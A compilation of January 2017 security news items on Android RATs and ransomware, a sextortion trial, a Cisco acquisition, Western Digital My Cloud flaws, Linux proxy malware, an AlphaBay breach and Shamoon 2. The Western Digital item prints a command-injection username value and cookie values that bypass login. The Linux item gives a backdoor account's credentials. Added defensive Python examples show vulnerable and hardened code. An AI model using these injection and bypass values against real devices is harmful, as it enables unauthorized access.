

Fake Netflix App Takes Control of Android Devices

25.1.2017 Securityweek Android
A recently spotted fake Netflix app is in fact installing a Remote Access Trojan (RAT) variant onto the victims’ devices, Zscaler security researchers have discovered.

Preying on the popularity of applications isn’t a new technique, with fake Super Mario Run games for Android recently used to distribute the Marcher and DroidJack Trojans. Now, it seems that the actors behind the SpyNote RAT have decided to use the same technique and leverage the enormous traction Netflix has among users looking to stream full movies and TV programs to their mobile devices.

Instead of a video streaming app, however, users end up with a RAT that can take advantage of their device in numerous ways, such as listening to live conversations by activating the microphone, executing arbitrary commands, sending files to a command and control (C&C) server, recording screen captures, viewing contacts, and reading SMS messages.

The fake Netflix app was supposedly created using an updated version of the SpyNote RAT builder, which leaked online last year, Zscaler reveals. Once installed, the app would display the icon that the legitimate Netflix app on Google Play has, but it should by no means be mistaken for it.

When the user clicks on the icon for the first time it disappears from the homescreen and nothing else seems to happen, a trick commonly used by mobile malware. In the background, however, the malware starts preparing its onslaught of attacks.

SpyNote RAT was found to use a free DNS service for C&C communication, as well as to leverage the Services, Broadcast Receivers, and Activities components of the Android platform to remain up and running on the infected device.

“Services can perform long-running operations in the background and does not need a user interface. Broadcast Receivers are Android components that can register themselves for particular events. Activities are key building blocks, central to an app’s navigation, for example,” Zscaler researchers note.

Additionally, the malware can uninstall apps from the infected device (such as antivirus protection), was designed to function only over Wi-Fi (to avoid raising suspicion), and can even take photos, the security researchers say. SpyNote RAT also collects the device’s GPS position to pinpoint the victim’s location, and packs various data exfiltration capabilities.

According to Zscaler, the SpyNote RAT builder has been gaining popularity in the hacking community. It can be used to disguise the malware as various fake apps, such as WhatsApp, YouTube Video Downloader, Google Update, Instagram, Hack Wifi, AirDroid, WifiHacker, Facebook, Photoshop, SkyTV, Hotstar, Trump Dash, and Pokemon GO (the game was abused for malware distribution even before being launched on Android).

“Furthermore, we found that in just the first two weeks of 2017, there have been more than 120 such spyware variants already built using the same SpyNote Trojan builder as SpyNote RAT and roaming in the wild,” the security researchers say. A similar trend is usually observed after the source code of a piece of malware leaks online.

To stay protected, users should refrain from installing applications from third-party app stores or side-loading them, especially games that haven’t yet been released on Android, such as Super Mario Run or Pokemon GO. “You should also avoid the temptation to play games from sources other than legitimate app stores; such games are not safe and may bring harm to your reputation and your bank account,” Zscaler concludes.

Dutch Man on Trial in 'Sextortion' Cyberbully Case

25.1.2017 Securityweek Crime
Amsterdam - A man accused of a worldwide cyberbullying racket that got young girls to pose naked before blackmailing them went on trial Wednesday in Amsterdam, saying he is innocent of the charges.

The defendant Aydin C. is suspected of forcing dozens of young women from as far as Britain, Canada, Norway and the United States into performing sex acts in front of their webcams.

"I deny all charges and will remain silent until my closing statement," a defiant Aydin C. -- identified only by his first name because of Dutch privacy rules -- told judges at a high-security courthouse.

The 38-year-old Dutchman faces 72 charges including computer sex crimes such as making and storing of child pornography, blackmail, fraud and hard drug possession, prosecutors said.

Aydin C. is also wanted for trial in Canada in the case of teen Amanda Todd who committed suicide in October 2012 after being tormented by an anonymous cyberbully.

Sexual acts

"He posed online as a young woman and established trust relationships with 34 young girls, eventually getting them to pose naked in front of a webcam," Dutch public prosecution service spokesman Lars Stempher told reporters outside the courtroom.

Once Aydin C. obtained the images, his tone changed and he would start to threaten the girls, telling them he would show the images to parents, relatives and school friends if they did not do as told.

"This included performing sexual acts and in the end the girls became trapped in his web," Stempher said.

Five gay men -- mainly in Australia -- were also lured in, when Aydin C. allegedly posed as a young boy and "eventually he threatened them that he would expose their sexuality, leading to blackmail."

In one case, an amount of 1,000 euros ($1,100) was then paid into an account, the court heard. Aydin C. used dozens of aliases like "Tyler Boo" and "Kelsy Rain" and employed different computer tricks, including a program to fool young girls into thinking they were chatting live to a girl of similar age. Investigators found some 204,000 images on hard disks belonging to the accused, but prosecutors did not say what the images depicted.

Aydin C., who leaned back in his chair during the hearing, his long greying hair slicked back behind his ears, did not respond to questions posed by the judge.

He was arrested after Facebook rang alarm bells in 2013, telling Dutch police a "sextortionist" -- somebody who uses sex to blackmail others -- was at work in The Netherlands.

Teen suicide

Canada has asked for Aydin C. to be extradited in the case of teen Amanda Todd who committed suicide in October 2012 after being tormented by an anonymous cyberbully.

"The notorious case, that of Amanda Todd regularly pops up in this case docket," Judge Karel Brunner said.

"That case is not before the court today. Obviously the Canadian authorities are planning to prosecute," the judge said.

A Dutch court in June last year ruled in favour of Aydin C.'s extradition to Canada to stand trial in connection with Todd's death. The extradition ruling is under appeal before the Dutch Supreme Court, the country's highest court.

The 15-year-old's suicide sparked a worldwide debate about appropriate online behaviour, and prompted calls for cyberbullying to be criminalised.

In a YouTube video watched by millions worldwide, Todd said before her death that she suffered from anxiety, "major depression" and panic attacks after a photo of her breasts, flashed in an online video chat with a stranger, was distributed in her community.

If extradited, however, Aydin C. will be sent to Canada only after the end of his trial in the Netherlands, prosecutors said, meaning it could still take years.

Commenting on the Dutch case, Aydin C.'s lawyer Robert Malewicz told AFP outside the courtroom "we are disputing that there is a proper link between the evidence presented and my client."

"We will ask for an acquittal," he said.

Cisco Buys App Performance Tuning Startup for $3.7 Billion

25.1.2017 Securityweek IT
San Francisco - Cisco Systems on Tuesday announced a $3.7 billion deal to buy a startup specializing in improving the performance of applications, continuing to expand beyond computer networking hardware.

The acquisition of AppDynamics came as the San Francisco-based startup was on the cusp of going public with an initial offering of stock.

AppDynamics software enables businesses to monitor performance of applications and figure out ways to avoid problems and get them to run more smoothly.

"Applications have become the lifeblood of a company's success," Cisco internet of things and business group general manager Rowan Trollope said in a release.

"The combination of Cisco and AppDynamics will allow us to provide end to end visibility and intelligence from the network through to the application."

Consumers are increasingly using applications, typically on mobile devices, to interact with businesses.

"As companies across industries are expanding their digital infrastructure, IT departments are faced with vast amounts of complex, siloed data," Cisco corporate business development vice president Rob Salvagno said in a blog post.

"AppDynamics helps many of the world's largest enterprises translate this data into business insights."

The deal was expected to close by the end of September.

Cisco last year announced it was trimming its global workforce by seven percent as it shifts its focus from networking hardware to software and services.

The plan to eliminate 5,500 positions came as part of a corporate restructuring aimed at reducing expenses in "lower growth areas" and investing in Cisco priorities such as security, cloud computing, data centers, and the internet of things, executives said at the time.

Faced with a slowdown in its traditional products such as routers for telecom networks, Cisco has been trying for several years to reorient to fast growing sectors.

The company also seeks to increase revenue from ongoing subscriptions for services or software, as compared to sales of equipment.

Cisco built its fortune on hardware for private data centers, but businesses are increasingly turning to "super-clouds" such as Amazon Web Services and Microsoft Azure which rent processing muscle as needed.

Switches and routers remain a big chunk of Cisco's business.

Northern California-based Cisco has had waves of job cuts from 2011 through 2014, eliminating a total of more than 17,000 positions.

Western Digital Patches Vulnerabilities in "My Cloud" Products

25.1.2017 Securityweek Vulnerability
The latest firmware update released by Western Digital for the My Cloud Mirror personal cloud storage product patches serious remote command execution and authentication bypass vulnerabilities.

ESET researcher Kacper Szurek recently discovered that WD My Cloud Mirror devices running firmware version 2.11.153, which had been the most recent version, were affected by several vulnerabilities caused by the lack of proper user input escaping.

The most serious of the flaws affects the index page of the product’s web interface and it allows an attacker to execute arbitrary commands via the “username” parameter. Commands can be executed using the following line as “username”: a" || your_command_to_execute || "

Szurek also discovered that an attacker can bypass authentication to the WD My Cloud Mirror interface. The problem, according to the expert, is that the function designed to check if the user has logged in can be easily bypassed as it only checks if the “username” and “isAdmin” cookies exist.

An attacker can bypass authentication by setting the values “username=1” and “isAdmin=1,” and then accessing one of the webpages (e.g. php/users.php).
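The two weaknesses described above are common web-application mistakes, so here is an added example (not Western Digital's code, and not taken from Szurek's report) showing each flawed pattern next to a hardened form: a login check that only tests whether cookies are present versus a server-side session lookup, and a username that is concatenated into a shell command string versus an allow-listed value passed as a single argv element. All function names, the `session` cookie and the `getent` lookup are assumptions made for the illustration.

```python
"""Added example (not Western Digital's code): cookie-presence login check
and shell-string concatenation, each beside a hardened form.  All function
names are hypothetical."""
import re
import secrets

# ---------------------------------------------------------------------------
# 1. Authentication check that only tests whether cookies *exist*.
# ---------------------------------------------------------------------------
def is_logged_in_weak(cookies):
    """Mirrors the described flaw: any client that sets username=1 and
    isAdmin=1 passes, because the values are never verified."""
    return "username" in cookies and "isAdmin" in cookies

# Hardened form: the cookie carries only an opaque, server-issued session id;
# the identity and the admin flag live in server-side state, never in the
# cookie, so the client cannot assert them.
SESSIONS = {}  # session_id -> {"username": str, "is_admin": bool}

def create_session(username, is_admin=False):
    session_id = secrets.token_urlsafe(32)  # 256 bits of randomness
    SESSIONS[session_id] = {"username": username, "is_admin": is_admin}
    return session_id

def current_user(cookies):
    """Return the session record for a valid server-issued id, else None.
    A forged or guessed id has no entry and is rejected."""
    return SESSIONS.get(cookies.get("session", ""))

def is_admin(cookies):
    user = current_user(cookies)
    return bool(user and user["is_admin"])

# ---------------------------------------------------------------------------
# 2. Username concatenated into a shell command string.
# ---------------------------------------------------------------------------
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")

def validate_username(username):
    """Allow-list check: POSIX-style account names only.  The quote and
    pipe characters in the injection string quoted above fail this test."""
    return bool(USERNAME_RE.match(username))

def build_lookup_unsafe(username):
    """The dangerous pattern: the value lands inside a shell command string,
    so a double quote and || in the input change what the shell runs.
    Returned as a string for illustration only; it is never executed here."""
    return 'sh -c "getent passwd \\"%s\\""' % username

def build_lookup_argv(username):
    """Hardened: validate first, then pass the value as one argv element so
    no shell ever parses it.  Suitable for subprocess.run(argv)."""
    if not validate_username(username):
        raise ValueError("invalid username")
    return ["getent", "passwd", username]
```

The point of the second half is that escaping is the wrong fix: once the value is kept out of any shell and restricted to an allow-list, there is nothing to escape, and a payload like the one quoted above is rejected before any command is built.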

The vulnerabilities were reported to WD in mid-November and they were patched on December 20 with the release of version 2.11.157 of the firmware. The vendor’s release notes describe these issues as a “security vulnerability related to remote access.”

Earlier this month, researcher Steven Campbell also reported finding a couple of flaws in WD’s My Cloud devices, including a command injection issue. The vendor patched the command injection vulnerability (CVE-2016-10108) in December with the release of firmware version 2.21.126. The second bug, tracked as CVE-2016-10107 and described as “variable checking for PHP pages for authenticated users,” will be addressed with an upcoming update.

This was not the first time researchers found security holes in WD’s personal cloud storage products. VerSprite identified a remote command injection vulnerability in My Cloud in September 2015.

Charger Android Ransomware Infects Apps on Google Play

25.1.2017 Securityweek Android
A newly discovered piece of Android ransomware embedded in apps available on Google Play threatens to sell a victim's personal data on the black market if they don’t pay, Check Point security researchers warn.

Dubbed Charger, the threat was found embedded in an application called EnergyRescue, and had the ability to steal contacts and SMS messages, while also asking for admin permissions on the device. If permissions are granted, the ransomware locks the device and displays a message demanding payment.

While threatening to sell victim’s personal information on the black market, the malware authors also claim that all of the victim’s data has been already saved on an attacker-controlled server. The miscreants say that the stolen information includes social network details, bank accounts, credit cards, as well as all data about the victim’s “friends and family.”

The demanded ransom is 0.2 Bitcoins (around $180), which “is a much higher ransom demand than has been seen in mobile ransomware so far,” Check Point notes. Previously spotted mobile ransomware such as DataLust only demanded a $15 ransom. Charger victims are asked to send the payments to a specific Bitcoin account.

With Android ransomware inflicting direct harm to users, it’s clear that Charger is yet another attempt by mobile malware developers to catch up with the PC ransomware, which has been wreaking havoc for the past couple of years. Recently, even the Tordow Android banking Trojan was seen packing data collection capabilities and ransomware-like behavior.

Charger was observed checking the infected device’s location to ensure it doesn’t run on devices located in Ukraine, Russia, or Belarus, presumably so that its authors avoid prosecution in their own countries or extradition between them.

While other malware in Google Play uses a dropper to download the malicious payload, Charger uses a heavy packing approach, which makes it harder for it to stay hidden. However, the ransomware authors did boost its evasion capabilities to ensure it can stay hidden in Google Play: the malware encodes strings into binary arrays to make it hard to inspect them, loads code from encrypted resources dynamically, and checks whether it runs in an emulator before running its routine.

According to Check Point, most detection engines cannot penetrate and inspect dynamically-loaded code, and the authors added an extra layer of protection by flooding the code with meaningless commands to mask the actual commands passing through. The researchers also point out that more and more mobile malware is running checks to avoid running in emulators and virtual machines, just as it happens in the PC malware landscape.

"Ripper" Service Helps Cybercriminals Identify Fraudsters

25.1.2017 Securityweek Crime
Researchers at threat intelligence firm Digital Shadows have analyzed a relatively new service named Ripper that aims to expose fraudsters who target the users of cybercrime marketplaces.

The people behind Ripper.cc started discussing the idea in mid-2015, but the service was only launched in June 2016. Currently, it stores information on more than 1,200 monikers that have been used to commit fraud on cybercrime forums.

While some cybercriminals earn money by selling stolen information, others, known as “rippers,” make a profit by selling fake login credentials, invalid payment card data, or items they don’t actually possess.

Escrow systems and blacklists have been used to minimize the risks posed by fraudsters, but these methods can be inconvenient or inefficient. One service that has been trying to fight rippers since 2005 is Kidala, a Russian website that provides a database of users known to have committed fraud.

However, some believe Kidala is not always impartial and it allows rippers to remove their name by paying a fee.

Ripper is available in English and it provides some highly useful features. Users can install Chrome and Firefox extensions that automatically highlight the name of a ripper on a website. The service also provides a plugin for the Jabber client Psi Plus, which highlights fraudsters in the messaging app’s contact list.


The website allows users to create ripper profiles that track a user across multiple forums, and it also stores specific examples of scams conducted by rippers.

Digital Shadows has pointed out that the development of Ripper is similar to how legitimate tech startups create their products.

“The founders plainly acknowledge their intention to displace the previous main player – kidala.info – and try to win customers over by promising better features. They also have to prove their credentials – in this case by saying that a number of well-known forums support this project and their existing reputation on these forums,” Digital Shadows analysts explained.

The site’s operators have promised to make the code open source to show that the plugins don’t include any malicious functionality, and they plan on making a profit by displaying ads on the website. In the future, they might launch an escrow service of their own and a mobile application.

“Ripper[.]cc is another example of the industrialization of hacking and the growing professionalism of cybercrime. If such a service becomes successful, it enables cyber criminals to significantly reduce the risks associated with rippers and the overall cybercrime economy can become more profitable allowing for further growth,” analysts said.

New Trojan Turns Thousands Of Linux Devices Into Proxy Servers
25.1.2017 thehackernews

"Linux doesn't get viruses" — It's a Myth.
A new Trojan has been discovered in the wild that turns Linux-based devices into proxy servers, which attackers use to protect their identity while launching cyber attacks from the hijacked systems.
Dubbed Linux.Proxy.10, the Trojan was first spotted at the end of last year by researchers from Russian security firm Doctor Web, who identified thousands of compromised machines by the end of January this year. The campaign is still ongoing and hunting for more Linux machines.
According to the researchers, the malware itself doesn't include any exploitation module to hack into Linux machines; instead, the attackers use other Trojans and techniques to compromise devices in the first place and then create a new backdoor login account with the username "mother" and the password "fucker."
Once the devices are backdoored, the attacker obtains the list of all successfully compromised Linux machines, logs into them via SSH, and installs a SOCKS5 proxy server on them using the Linux.Proxy.10 malware.
This Linux malware is not at all sophisticated, since it uses the freeware source code of the Satanic Socks Server to set up a proxy.
According to the security firm, thousands of Linux-based devices have already been infected with this new Trojan.

Besides this, the same server — belonging to the cybercriminals who distribute the Linux.Proxy.10 malware — not only contained the list of compromised devices but also hosted the control panel of a Spy-Agent computer monitoring software and a Windows malware from a known family of Trojan spyware, called BackDoor.TeamViewer.
This is not the first time when such Linux malware has been discovered.
Over a year ago, ESET security researchers uncovered a similar malware, dubbed Moose, that also had the capability to turn Linux devices into proxy servers that were then used for launching armies of fake accounts on social media networks, including Instagram, and Twitter.
Linux users and administrators are advised to tighten SSH security by limiting or disabling remote root access via SSH, and, to find out whether a system has already been compromised, to keep a regular watch on newly created login accounts.
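The two recommendations above (restrict root access over SSH, watch for new login accounts) can both be turned into checks. The following is an added example, not Doctor Web's tooling: it audits an `sshd_config` text for remote root login and password authentication, and diffs the shell-capable accounts in an `/etc/passwd`-format text against a known-good baseline. The config and passwd contents are constructed samples (the baseline is assumed to have been taken while the host was clean, and the added account reuses the username named in the article), and all function names are hypothetical.

```python
"""Added example (not Doctor Web's code): audit sshd_config for remote root
access and flag login accounts absent from a known-good baseline.  Config and
passwd text are constructed samples; function names are hypothetical."""
import re

# Constructed sshd_config: the root-login directive is commented out and
# password logins are still on.
SAMPLE_SSHD_CONFIG = """\
Port 22
#PermitRootLogin prohibit-password
PasswordAuthentication yes
"""

# The same file after hardening.
HARDENED_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
AllowUsers ops backup
"""

def parse_sshd_config(text):
    """Map lowercased directive -> first value.  sshd honours the first
    occurrence of a directive, and anything after a Match block is
    conditional, so parsing stops there."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings

def audit_sshd_config(text):
    """Return a list of findings; empty means the checked settings are tight.
    An absent directive is treated as permissive (an assumption made here so
    the audit does not depend on the OpenSSH version's built-in default)."""
    s = parse_sshd_config(text)
    findings = []
    if s.get("permitrootlogin", "yes").lower() != "no":
        findings.append("PermitRootLogin is not 'no': root can log in over SSH")
    if s.get("passwordauthentication", "yes").lower() != "no":
        findings.append("PasswordAuthentication is on: password guessing is possible")
    if "allowusers" not in s and "allowgroups" not in s:
        findings.append("no AllowUsers/AllowGroups: every local account may log in")
    return findings

# Constructed /etc/passwd baseline from a known-good state, and the current
# file with the backdoor account named in the article added.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ops:x:1000:1000:ops:/home/ops:/bin/bash
"""
CURRENT_PASSWD = BASELINE_PASSWD + "mother:x:1001:1001::/home/mother:/bin/bash\n"

def login_accounts(passwd_text):
    """Accounts that can get an interactive shell: name -> uid."""
    accounts = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if not shell.endswith(("/nologin", "/false")):
            accounts[name] = uid
    return accounts

def new_login_accounts(baseline_text, current_text):
    """Shell-capable accounts present now but absent from the baseline."""
    base = login_accounts(baseline_text)
    return sorted(n for n in login_accounts(current_text) if n not in base)

def extra_root_accounts(passwd_text):
    """Any account other than root with uid 0 (a second, hidden superuser)."""
    return sorted(n for n, uid in login_accounts(passwd_text).items()
                  if uid == 0 and n != "root")
```

On a live host, feed `open("/etc/ssh/sshd_config").read()` and `open("/etc/passwd").read()` to these functions from a periodic job and alert on any non-empty result; the baseline should be stored off-host so that an attacker who adds an account cannot also rewrite the reference copy.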

AlphaBay Dark Web Marketplace Hacked; Exposes Over 200,000 Private Messages
25.1.2017 thehackernews Hacking
AlphaBay, possibly the largest active dark web marketplace at the moment, has paid a hacker after he successfully exploited vulnerabilities in the internal mailing system of the website and hijacked over 200,000 private unencrypted messages from several users.
The hacker, using the pseudonym Cipher0007, disclosed two "high-risk bugs" two days ago on Reddit that allowed him to gain access to troves of private messages belonging to buyers and sellers on the dark website, AlphaBay admins announced on Tuesday.
It turns out that the messages were not encrypted by default, which gave the hacker ability to view all messages between vendors and buyers selling and purchasing everything from illicit drugs to exploits, malware, and stolen data.
Over 218,000 Private Messages of Anonymous Dealers Exposed

To prove he had successfully compromised the AlphaBay website, the hacker posted five screenshots of random user private conversations, showing that AlphaBay users had openly exchanged their names, personal addresses and tracking numbers without encryption.
"We have been made aware of the bug that allowed an outsider to view marketplace private messages," reads a statement from the AlphaBay administrators on Pastebin, and "we believe that the community has the right to be made aware of what information was obtained."
A first vulnerability allowed the hacker to obtain more than 218,000 personal messages sent between their users within the last 30 days, while the second bug allowed him to obtain a list of all usernames and their respective user IDs.
However, the AlphaBay admins assured that those users who did not receive any message in their inboxes in the last 30 days were not affected. They also claimed the bugs were only exploited by one single hacker.
AlphaBay Fixes the Bugs and Pays the Hacker
The admins also assured their users that AlphaBay forum messages, order data, and Bitcoin addresses of users are all safe, and the issue was fixed just within four hours after the Reddit user went public.
"The attacker was paid for his findings, and agreed to tell us the methods used to extract such information," AlphaBay admins said. "Our developers immediately closed the loophole in order to protect the security of our users."
Meanwhile, they advised AlphaBay users to make use of a PGP key and always encrypt their sensitive data, including delivery addresses, Bitcoin wallet IDs, tracking numbers, and others.
Since AlphaBay is a dark web marketplace that is only accessible via the Tor Browser, the bug could have been exploited by law enforcement to unmask the real identities of users who deal in drugs and other illegal activities.
But, AlphaBay members using the PGP key and encrypting their account details would be on a safer side.
This is not the very first time when a hacker discovered a flaw in the AlphaBay dark website. AlphaBay faced a similar vulnerability in April last year when its users' private messages were left exposed due to a flaw in its newly-launched API, allowing an attacker to obtain 13,500 private messages.

Russia arrested Ruslan Stoyanov the head of the investigation unit at the Kaspersky in ‘Treason Probe’
25.1.2017 securityaffairs Congress

Russian authorities arrested Ruslan Stoyanov the head of the investigation unit at the Kaspersky Lab in ‘Treason Probe’.
Sad news is shaking the IT security industry: the Russian authorities have arrested Ruslan Stoyanov, one of the most important cybercrime investigators working for Kaspersky Lab.

Ruslan Stoyanov heads the investigation unit at Kaspersky Lab; according to the security firm, he is under investigation for a period predating his employment there. Stoyanov was involved in every major anti-cybercrime operation in Russia in recent years, including the one against members of the Lurk cybercrime gang.

“This case is not related to Kaspersky Lab. Ruslan Stoyanov is under investigation for a period predating his employment at Kaspersky Lab,” reported Forbes citing a Kaspersky spokesperson’s statement. “We do not possess details of the investigation. The work of Kaspersky Lab’s Computer Incidents Investigation Team is unaffected by these developments.”

According to Kommersant, the arrest may be linked to the investigation into Sergei Mikhailov, deputy head of the information security department of the FSB (Russia’s national security service).

Stoyanov and Mikhailov were both arrested in December; according to Kommersant, the investigation is examining money Stoyanov received from foreign companies and his links to Mikhailov.

The case appears to be very important; according to a source quoted by FORBES, the details of the investigation were likely to remain private.
“A Russia-based information security source told FORBES the details of the case were likely to remain private. The case has been filed under article 275 of Russia’s criminal code, the source said, meaning it should result in a secret military tribunal. Article 275 allows the government to prosecute when an individual provides assistance to a foreign state or organization regarding “hostile activities to the detriment of the external security of the Russian Federation” (translation from source). According to the source, this can be applied broadly. For instance, furnishing the FBI with information on a botnet may amount to treason.” reported FORBES.

Who is Stoyanov?

Before Stoyanov joined Kaspersky in 2012, he served six years as a major in the Ministry of Interior’s cybercrime unit between 2000 and 2006, then he moved into the private sector.

FORBES was also informed that while Ruslan Stoyanov was working for the Russian government, he was the lead investigator into a hacker crew that extorted $4 million from U.K. betting shops under threat of DDoS attacks.

Three members of the cyber gang were identified and arrested by the investigators.

Stay tuned.

Symantec speculates Shamoon 2 attacks aided by Greenbug hackers
25.1.2017 securityaffairs

Security researchers at Symantec believe that the Shamoon 2 attacks leveraged credentials stolen by hackers of the Greenbug group.
A few days ago security experts at Palo Alto Networks have spotted a new strain of the Shamoon 2 malware that was targeting virtualization products.

In December malware researchers from Palo Alto Networks and Symantec discovered a new variant of Shamoon, so-called Shamoon 2, that was used at least in a targeted attack against a single Saudi organization, the Saudi Arabia’s General Authority of Civil Aviation (GACA).

“Why Shamoon has suddenly returned again after four years is unknown. However, with its highly destructive payload, it is clear that the attackers want their targets to sit up and take notice,” reported Symantec.

“Last week, Unit 42 came across new Disttrack samples that appear to have been used in an updated attack campaign. The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45. In another similarity to Shamoon, this is the end of the work week in Saudi Arabia (their work week is from Sunday to Thursdays), so the malware had potentially the entire weekend to spread. The Shamoon attacks took place on Lailat al Qadr, the holiest night of the year for Muslims; another time the attackers could be reasonably certain employees would not be at work.” reads an analysis published by Palo Alto Networks.


Shamoon, also known as Disttrack, was first spotted in a wave of attacks that targeted companies in Saudi Arabia in 2012. Among the victims, there was the petrol giant Saudi Aramco. The principal capability of Shamoon is a feature that allows it to wipe data from hard drives of the infected systems.

In the attack against Saudi Aramco, Shamoon wiped data on over 30,000 computers and overwrote the hard drive MBR (Master Boot Record) with an image of a burning US flag.

Palo Alto Networks also spotted a second variant of Shamoon 2 that had been configured to start wiping infected systems at 1:30 AM (Saudi Arabia time) on November 29, when the employees of the targeted organization were likely at home.

The first variant of Shamoon 2 analyzed by the experts presented a default configuration that allowed the execution of the disk-wiping component at 8:45pm local time on Thursday, November 17. Considering that in Saudi Arabia the working week runs from Sunday to Thursday, the attacker tried to exploit the pause in order to maximize the effects of the attack.

Both payloads were similar, but the analysis of the experts revealed some differences.

Threat actors used stolen credentials to deliver the malware to the target systems; according to researchers at Symantec, these credentials may have been provided by another cyber espionage group called Greenbug.

Greenbug hackers used the Ismdoor remote access Trojan (RAT) and other tools in attacks against organizations in the Middle East.

Ismdoor establishes a backdoor on the target machine and leverages PowerShell for command and control (C&C).

The group targeted organizations in multiple industries, including aviation, investment, government and education organizations in several countries (i.e. Saudi Arabia, Iran, Iraq, Bahrain, Qatar, Kuwait and Turkey, and a Saudi company in Australia).

“Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors. The group uses a custom information-stealing remote access Trojan (RAT) known as Trojan.Ismdoor as well as a selection of hacking tools to steal sensitive credentials from compromised organizations.” states the Symantec report on Greenbug.

“Although there is no definitive link between Greenbug and Shamoon, the group compromised at least one administrator computer within a Shamoon-targeted organization’s network prior to W32.Disttrack.B being deployed on November 17, 2016.”

Greenbug launched spear phishing attacks against its victims in order to trick users into downloading the malicious code onto their systems. The email messages are fake business proposals that deliver a RAR archive containing a clean PDF and a compiled HTML help file (.chm) that carries the Ismdoor Trojan.

The Greenbug hackers abused NTFS alternate data streams (ADS) to avoid detection.

“Windows Alternate Data Streams (ADS) is a feature of NTFS which is used to store details about a file. The information stored in ADS is hidden to the user, which makes it an attractive feature for attackers. ADS is sometimes abused by attackers to hide malware or other hacking tools on a compromised computer.” continues the analysis.

Researchers at Symantec speculate that Greenbug may have supplied credentials for the Shamoon 2 attacks: the experts detected the Ismdoor malware on an administrator computer belonging to one of the organizations targeted with Shamoon 2.

It is important to highlight that there is no technical evidence that Greenbug and Shamoon 2 attackers are linked, but it is interesting to note that Greenbug seems to have vanished one day before the November 17 attacks.

“The presence of Greenbug within an organization prior to the destructive attack involving W32.Disttrack.B provides only a tentative connection to Shamoon. Greenbug’s choice of targets and the fact that Ismdoor and associated tools downloaded by the threat appear to have gone quiet a day prior to the November 17, 2016 Shamoon attack is, however, suspicious.” reads the report.

Saudi Arabia is warning organizations of a wave of Shamoon 2 attacks
25.1.2017 securityaffairs

Saudi Arabia is warning organizations in the country of a resurrection of the dreaded Shamoon malware.
A new strain of the Shamoon 2 malware was spotted by security experts at Palo Alto Networks; this variant also targets virtualization products.

Shamoon, also known as Disttrack, was first spotted in a wave of attacks that targeted companies in Saudi Arabia in 2012. Among the victims, there was the petrol giant Saudi Aramco and RasGas Co Ltd.

In the 2012 attacks, threat actors used images of a burning U.S. flag to overwrite the drives of victims.

The principal capability of Shamoon is the ability to wipe data from the hard drives of infected systems.

In the attack against Saudi Aramco, Shamoon wiped data on over 30,000 computers and overwrote the hard drive MBR (Master Boot Record) with an image of a burning US flag.

The malware was first discovered by Kaspersky Lab, which analyzed instances of the threat linked to a “wiper agent” because one of its modules contained a string with “wiper” in its name.

On Monday, the Saudi Arabian labor ministry revealed it had been attacked and also a chemical firm reported a network disruption.


A state news agency confirmed the attack against the labor ministry, but excluded any impact on the data.

The Reuters agency also revealed that the telecoms authority is inviting all parties to be vigilant for the spreading of a new version of the malware, the Shamoon 2.

According to security experts, the threat actor behind the Shamoon attacks was likely working on behalf of the Iranian government in 2012.

“The Shamoon hackers were likely working on behalf of the Iranian government in the 2012 campaign and the more-recent attacks, said Adam Meyers, vice president with cyber security firm CrowdStrike. “It’s likely they will continue,” he said.” Reuters reported.

The state-controlled Al Ekhbariya TV confirmed that multiple Saudi organizations had been targeted in a recent string of cyber attacks.

The Sadara Chemical Co, a joint venture firm owned by Saudi Aramco and Dow Chemical, confirmed it had suffered a network disruption on Monday morning. The experts at the company are still working to resolve the problem.

Sadara | صدارة ✔ @Sadara
Sadara has experienced a network disruption this morning, and are working to resolve it. Our operations have not been affected.
3:49 PM - 23 Jan 2017
As part of the incident response, the company stopped all services related to the network.

Reuters said that other companies in the Jubail petrochemicals hub also experienced network disruptions.

“Those companies sought to protect themselves from the virus by shutting down their networks, said the sources, who declined to identify specific firms.” Reuters reports.

Saudi Arabia Computer Emergency Response Team (CERT)’s Abdulrahman al-Friah confirmed to Al Arabiya that at least 22 institutions were affected by the wave of Shamoon attacks.

“We cannot definitely determine the financial costs of such breaches yet as it depends on each institution’s platform. Websites which sell and buy will obviously be affected the most,” al-Friah said.

Sage 2.0 Ransomware is spreading and demands a $2,000 Ransom
25.1.2017 securityaffairs

A newly observed spam campaign is spreading a ransomware variant known as Sage 2.0 that is demanding a $2,000 ransom for the decryption key.
Sage 2.0 is a new ransomware recently spotted by security experts; it was first observed in December and is now being distributed via malicious spam. Sage is considered a variant of the CryLocker ransomware and is also distributed by the Sundown and RIG exploit kits. The current campaign also leverages steganography, exfiltrating information about the victim’s PC inside a PNG image.


The malicious messages have a ZIP attachment that contains a Word document with malicious macros that once executed download and install the Sage ransomware. In some cases the experts also observed that the ZIP archive contains a .js file with the same functionality.

Duncan also explained that some of the malicious attachments are double-zipped and often the recipient’s name is part of the attachment’s file name.

“Emails from this particular campaign generally have no subject lines, and they always have no message text. The only content is a zip attachment containing a Word document with a malicious macro that downloads and installs ransomware. Sometimes, I’ll see a .js file instead of a Word document, but it does the same thing.” Duncan wrote in a report. “Often, the recipient’s name is part of the attachment’s file name. I replace those names with [recipient] before I share any info. A more interesting fact is the attachments are often double-zipped. They contain another zip archive before you get to the Word document or .js file.”

When the Sage 2.0 ransomware infects a Windows 7 machine it triggers a User Account Control (UAC) prompt, which means the user has to authorize its execution.

The ransom note includes instructions to pay an initial $2,000 ransom (or 2.22188 bitcoin). The ransomware uses a Tor-based domain with a decryptor screen.

In case of non-payment the fee increases over time; the Tor website also displays a deadline for recovering the files.

